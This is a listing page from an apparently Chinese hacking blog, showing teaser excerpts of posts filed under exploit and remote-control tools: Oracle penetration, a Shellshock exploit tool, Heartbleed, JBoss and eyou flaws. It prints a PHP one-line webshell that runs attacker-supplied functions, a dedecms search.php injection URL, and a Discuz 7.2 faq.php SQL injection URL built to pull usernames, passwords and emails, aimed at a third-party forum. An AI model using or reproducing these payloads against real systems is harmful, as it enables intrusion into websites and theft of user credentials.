预览模式: 普通 | 列表

isafe.cc" target="_blank">isafe.cc-欢迎使用
  感谢您使用 『便携式文件夹加密器』

  河马软件致力于为您提供更安全、更高效、更便捷的加密软件。

查看更多...

Tags: 加密

分类:密码哈希解密 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1965

Oracle数据库渗透技术浅析

  
                      
文/图赵显阳(isafe.cc" target="_blank">isafe.cc" target="_blank">http://www.isafe.cc" target="_blank">isafe.cc)
oracle数据库简介
oracle是一个数据库系统,和 MS SQL Server 数据库类似,支持SQL语言的同时还支持ada编程、Java代码编程等,可以运行在Windows,Linux等操作系统上,今天来对如何渗透Oracle数据库系统进行研究,Oracle的漏洞有很多,如默认DBSNMP账号密码,低版本的SID枚举,本地权限提升,一些函数存在SQL注入,缓冲区溢出等等。下面我们先来破解Oracle的登录账号,然后使用Delphi编程在数据库服务器上执行任意命令。
oracle数据库账号破解

查看更多...

分类:oracle密码破解 | 固定链接 | 评论: 3 | 引用: 0 | 查看次数: 9801

『河马』HTTP Request Editor




『河马』HTTP Request Editor
用于分析HTTP数据包,可构GET POST COOKIE请求

查看更多...

Tags: websmart

分类:WebSmart | 固定链接 | 评论: 2760 | 引用: 0 | 查看次数: 54236

文件/user/storage_explort.php
<?php
/**
* 用户网络存储列表
*

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 167 | 引用: 0 | 查看次数: 14284

dedecms的最近出的一高危漏洞,
存在漏洞的文件/plus/search.php
下面是漏洞的详细利用细节:
    
isafe.cc" target="_blank">isafe.cc/plus/search.php?keyword=as" target="_blank">http://www.isafe.cc" target="_blank">isafe.cc/plus/search.php?keyword=as&typeArr[ uNion ]=a

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 13 | 引用: 0 | 查看次数: 4364

『河马』apache mod_cgi bash 命令注入漏洞



2014年9月24日Bash被公布存在远程代码执行漏洞,河马安全网第一时间根据信息研判,确认该漏洞可以
产生严重的后果,且分布广泛,于北京时间9月24日早晨5时30分启动了分析代码和工具利用编写。
河马安全网针对该漏洞进行了严格地分析验证,确认该漏洞会影响目前主流的Linux和Mac OSX操作系统平
台,包括但不限于Redhat、CentOS、Ubuntu、Debian、Fedora、Amazon Linux、OS X 10.10等平

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2362


【河马】 php一句话木马服务端和客户端v1.1
版本1功能:软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?>
写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令,
支持的函数有system,shell_exec,passthru

查看更多...

Tags: 远程控制

分类:远程控制 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3265

discuz_7.2_faq.php_注入漏洞利用工具 POC
http://bbs.dianjian.net//faq.php?action=
grouppermission&gids[99]=%27&gids[100]
[0]=)%20and%20(select%201%20from%20
(select%20count(*),concat((select%20(select%20(select%20concat(username,0x23,password,0x23,email)%20f

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2743


eyou 邮件系统存在SQL注入漏洞,利用此漏洞可以获取webshell


查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3749

【河马】ssh转socks工具--附源代码



【基本简介】 可以简单方便的连接ssh服务器。在SSH服务器用户名和密码处填写对应的用户名和密码,
并选中启动后就链接、掉线后自动连接、启用动态SOCKS,设置完毕后点击保存按钮并点击连接按钮就可以开
始连接啦。

查看更多...

Tags: remote control

分类:远程控制 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1517

在ssl数据包中有一个数据结构,包含了数据的长度(len)和内容(payload),这个数据结构会经过一次

memcpy,这个函数的最后一个参数为复制的长度len,如果len等于payload的长度,就相安无事,
如果len大于payload的长度就会越界,泄露多出来的那段内存,len是一个无符号整数,最大值为
65535,所有能泄露64k的数据,当payload的长度为0时,泄露最大的内存数据。

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1562


JBoss-4.2.3.GA  invoker code exec 漏洞
成功利用该漏洞可以执行任意命令,包括jsp
webshell等。

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2575

黑客狙击者v1.0



1.将压缩包解压到C:\sniper或D:\sniper目录(目录不存在,自行创建)

2. 切换到软件目录,然后执行:sniper_svc.exe /install 即可

查看更多...

Tags: websmart

分类:其它工具软件 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1402
无标题文档